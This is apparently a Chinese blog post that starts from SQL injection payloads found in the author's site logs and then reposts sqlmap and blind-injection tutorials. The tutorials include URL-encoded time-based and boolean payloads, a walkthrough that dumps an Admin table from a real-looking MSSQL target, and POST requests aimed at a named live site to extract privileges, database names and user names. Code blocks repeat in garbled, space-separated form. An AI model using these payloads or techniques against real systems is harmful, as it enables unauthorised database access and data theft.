網站被攻擊掃描SQL注入的平常記錄

我發了個博客,泄露了域名以後,便有人瘋狂的嘗試攻擊個人站點,奈何我防守作得比較好,直接把網段封了,看到403還持之以恆,我真是想給他頒獎了

查看ua,發現不少sqlmap的ua,確定會是被刷了,只是運氣比較好,沒突破防守

 

日誌記錄裏邊出現這條,通過查閱,是注入攻擊

%29%3BSELECT%20PG_SLEEP%285%29

原文在這裏

https://www.jianshu.com/p/267965649779

下一條 

%28SELECT%20CHAR%28113%29%2BCHAR%28106%29%2BCHAR%28107%29%2BCHAR%28120%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%288745%3D8745%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28112%29%2BCHAR%28106%29%2BCHAR%28113%29%29

 相關資料在

原文在http://www.javashuo.com/article/p-omdilvvj-kr.html

發佈者

 

sqlmap注入檢測經驗0x01
某日偶遇一SQLInjection Point,MSSQL 2008,已開啓顯錯模式。
立刻扔進SQLMap跑，一路順暢，居然仍是SA的權限，心想運氣真好，不管如何都拿定了。
數據庫，表，列都列出來了，可是上–dump參數就死活跑不出來。
報錯 「unable to retrieve the number of entries for table ‘Admin’ in database ‘2012_xxxx’」——x是馬賽克哈：）
心想應該很容易搞定，遂查找手工注入方法，測試無果。
仍是回到SQLMap，-h查看幫助，發現-v 參數能夠指定輸出詳細度，開到-v 3，發現顯示了payload，一不作二不休，直接開到-v 5，發現提供了整個http請求，怪不得報錯，原來都是返回500，用firefox打開完整payload，說是語法錯誤。

Xhttp://www.xxxx.cn/xxx/detail.aspx?id=218%20AND%204416%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28115%29%2BCHAR%28119%29%2BCHAR%28100%29%2BCHAR%28113%29%2B%28SELECT%20ISNULL%28CAST%28COUNT%28*%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%20FROM%20%222012_xxxx%22..syscolumns%2C2012_xxxx..sysobjects%20WHERE%202012_xxxx..syscolumns.id%3D2012_xxxx..sysobjects.id%20AND%202012_xxxx..sysobjects.name%3DCHAR%2884%29%2BCHAR%2866%29%2BCHAR%2895%29%2BCHAR%2865%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%28105%29%2BCHAR%28110%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28122%29%2BCHAR%28104%29%2BCHAR%28113%29%29%29


顯然是2012的問題，也就是應該是錯把庫名中的數字錯當成參數了

在URL的庫名加上雙引號包裹，果真就能夠爆出數據了。

問題又來了，要我手工爆數據我可搞不定，仍是要回到SQLMap啊，意思是要想辦法把庫名包裹起來，不讓系統把它解析成一個參數

XTEST1: ./sqlmap.py -u http://www.xxxx.cn/xxxx/detail.aspx?id=218 –dump -D」‘2012_xxxx」 -T’Admin’
此次好一點了，仍是報錯unable to retrieve column names for table ‘Admin’ in database ‘」2012_xxxx」‘，意思是有返回了，可是庫名不對。

XTEST12 ./sqlmap.py -u http://www.xxxx.cn/broadband/detail.aspx?id=218  –dump -D」[2012_xxxx]」 -T’Admin’
我也不記得哪來的靈機一動，改用中括號包裹，果真就成功了，dump出整個表了。

XCONCLUSION：在使用SQLMap時可使用-v參數指定輸出詳細度，而後直接用瀏覽器查看payload，肯定語法錯誤點後想辦法改進。在遇到系統誤判庫名錶名是可用中括號包裹名字。

爲避免原文刪除,因此搬過來了

 下一條

%28SELECT%20%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28107%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282244%3D2244%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28112%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%29

 下一條

%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%27XsDx%27%3D%27XsDx

 

 原文地址http://www.91ri.org/4732.html

注入的基礎知識就不說的了，只是在這裏作個簡單的筆記，以便以後拿起了就用。

 

 

 

 

 

 

Default

 

POST /card.aspx HTTP/1.1 Content-Length: 96 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Cookie: ASP.NET_SessionId=2k32d0nwvrzpbg55qucudt3b Host: www.cunlide.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept: */* cardid=1&cardpwd=1&Submit2=1&username=pxnjodhe%27%3b%20waitfor%20delay%20%270%3a0%3a5%27%20--%20

1 2 3 4 5 6 7 8 9 10 11 12

POST / card . aspx HTTP / 1.1 Content - Length : 96 Content - Type : application / x - www - form - urlencoded X - Requested - With : XMLHttpRequest Cookie : ASP . NET_SessionId = 2k32d0nwvrzpbg55qucudt3b Host : www . cunlide . com Connection : Keep - alive Accept - Encoding : gzip , deflate User - Agent : Mozilla / 5.0 ( compatible ; MSIE 9.0 ; Windows NT 6.1 ; WOW64 ; Trident / 5.0 ) Accept : * / *   cardid = 1 & amp ; cardpwd = 1 & amp ; Submit2 = 1 & amp ; username = pxnjodhe % 27 % 3b % 20waitfor % 20delay % 20 % 270 % 3a0 % 3a5 % 27 % 20 -- % 20

看POST數據，注入是發生在username這裏。把username的值URL解碼下這樣比較清楚點。

 

 

 

 

 

 

Default

 

pxnjodhe%27%3b%20waitfor%20delay%20%270%3a0%3a5%27%20--%20 pxnjodhe'; waitfor delay '0:0:5' --

1 2 3

pxnjodhe % 27 % 3b % 20waitfor % 20delay % 20 % 270 % 3a0 % 3a5 % 27 % 20 -- % 20   pxnjodhe '; waitfor delay ' 0 : 0 : 5' --

 

由於延時注入是經過頁面返回的時間來判斷的，因此當我進行猜解的時候也就是用時間來進行猜解，好比咱們能夠取出db_name的第一個字符，先轉換 成ASCII在和數字進行比較（推薦使用<、>），在比較時咱們能夠用折半法，好比咱們先猜解第一個字符是大寫字母仍是小寫字母，就能夠用 91來作個標準小於91的爲大寫字母（A-F，或許是_ 、-），大於則反。

下面兩個語句爲例子：

 

 

 

 

 

 

 

Default

 

cardid=1&amp;cardpwd=1&amp;Submit2=1&amp;username=pxnjodhe%27;if%20(0%3D(SELECT%20IS_MEMBER ('db_owner')))%20waitfor%20delay%20%270:0:11%27%20--%20 //判斷權限 cardid=1&amp;cardpwd=1&amp;Submit2=1&amp;username=pxnjodhe%27;if(ascii(substring(db_name(),1,1)))&gt;40%20waitfor%20delay%20%270:0:2%27%20--%20 //數據庫名 cardid=1&amp;cardpwd=1&amp;Submit2=1&amp;username=pxnjodhe%27;if(ascii(substring(user_name(),1,1)))&gt;115%20waitfor%20delay%20%270:0:1%27%20--%20 //用戶名

1 2 3 4 5 6

cardid = 1 & amp ; cardpwd = 1 & amp ; Submit2 = 1 & amp ; username = pxnjodhe % 27 ; if % 20 ( 0 % 3D ( SELECT % 20IS_MEMBER ( 'db_owner' ) ) ) % 20waitfor % 20delay % 20 % 270 : 0 : 11 % 27 % 20 -- % 20 //判斷權限 cardid = 1 & amp ; cardpwd = 1 & amp ; Submit2 = 1 & amp ; username = pxnjodhe % 27 ; if ( ascii ( substring ( db_name ( ) , 1 , 1 ) ) ) & gt ; 40 % 20waitfor % 20delay % 20 % 270 : 0 : 2 % 27 % 20 -- % 20 //數據庫名 cardid = 1 & amp ; cardpwd = 1 & amp ; Submit2 = 1 & amp ; username = pxnjodhe % 27 ; if ( ascii ( substring ( user_name ( ) , 1 , 1 ) ) ) & gt ; 115 % 20waitfor % 20delay % 20 % 270 : 0 : 1 % 27 % 20 -- % 20 //用戶名

 

建議用時但編碼狀態出問題時，能夠試試未編碼狀態。

原文沒有圖,防止失效,搬過來

 下一條

%20UNION%20ALL%20SELECT%20NULL%2CNULL

 這個查詢結果就不少了,再也不把文章拿過來